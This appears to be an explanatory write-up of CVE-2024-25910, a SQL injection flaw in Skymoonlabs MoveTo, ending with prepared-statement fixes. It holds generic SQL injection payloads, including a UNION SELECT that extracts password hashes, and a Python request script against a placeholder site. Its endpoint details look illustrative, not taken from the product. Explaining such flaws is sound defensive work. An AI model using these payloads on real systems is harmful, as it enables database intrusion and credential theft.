CVE-2024-25910 - SQL Injection Vulnerability in Skymoonlabs MoveTo (Up to 6.2) – Exploit Details, Code Example, and Remediation

Summary:
A critical SQL Injection vulnerability (CVE-2024-25910) exists in Skymoonlabs MoveTo from unknown initial versions up through and including version 6.2. This bug lets attackers inject malicious SQL through user-supplied data, letting them read or manipulate the application’s database. This article explains the issue, uses simple language, shows an example exploit, and links to official references.

What is CVE-2024-25910?

CVE-2024-25910 is titled: “Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)”. It affects Skymoonlabs MoveTo, a popular web-based platform. Versions until 6.2 are vulnerable. An unauthenticated user can use the flaw to send crafted input, bypassing database security and possibly leaking, changing, or deleting sensitive data.

How Does the Vulnerability Work?

The bug exists because the application does not properly escape user-provided input in SQL queries in some procedures or endpoints.

When taking user input and making SQL queries like this

// vulnerable PHP pseudo-code
$user_id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id = '$user_id'";
$result = mysqli_query($conn, $sql);

There’s no sanitization or prepared statements, so an attacker can pass this value

?id=1' OR '1'='1

The query becomes

SELECT * FROM users WHERE id = '1' OR '1'='1'

This always returns every user!

How Could this be Exploited?

Suppose the id parameter is used unsafely, as above, and there is no authentication for this page.

Send a request like

GET /users.php?id=1' OR '1'='1

This might show all user records.

Advanced Exploit Example: Extracting a Password Hash

Change the payload to

?id=' UNION SELECT 1,username,password,NULL FROM users-- -

Modified SQL query

SELECT * FROM users WHERE id = ''
UNION SELECT 1,username,password,NULL FROM users-- -'

If the page shows database output, an attacker now sees usernames and password hashes.

Here's a simple Python script using requests to exploit the issue

import requests

url = "http://target-moveto-site.com/users.php";
payload = "1' OR '1'='1"   # Basic SQL injection

params = {'id': payload}

r = requests.get(url, params=params)
print(r.text)   # The response may include all users

References

- CVE-2024-25910 at NVD
- Skymoonlabs MoveTo Product Page (official vendor site)
- OWASP SQL Injection Explained

How to Fix

Update Immediately:
If you use MoveTo version 6.2 or below, upgrade to the latest release as soon as possible.

Developers Should:
- Use prepared statements / parameterized queries instead of adding variables directly to SQL queries.

Example fix in PHP (using prepared statements)

$user_id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param('i', $user_id);
$stmt->execute();
$result = $stmt->get_result();

Conclusion

CVE-2024-25910 is a dangerous SQL Injection bug found in Skymoonlabs MoveTo up to version 6.2. If you run this software, update right away and audit your code for unsafe SQL usage. Always sanitize input and use prepared statements—never trust user data in your SQL!

*Stay safe—always patch, validate, and code securely.*

Timeline

Published on: 02/28/2024 13:15:09 UTC
Last modified on: 02/28/2024 14:06:45 UTC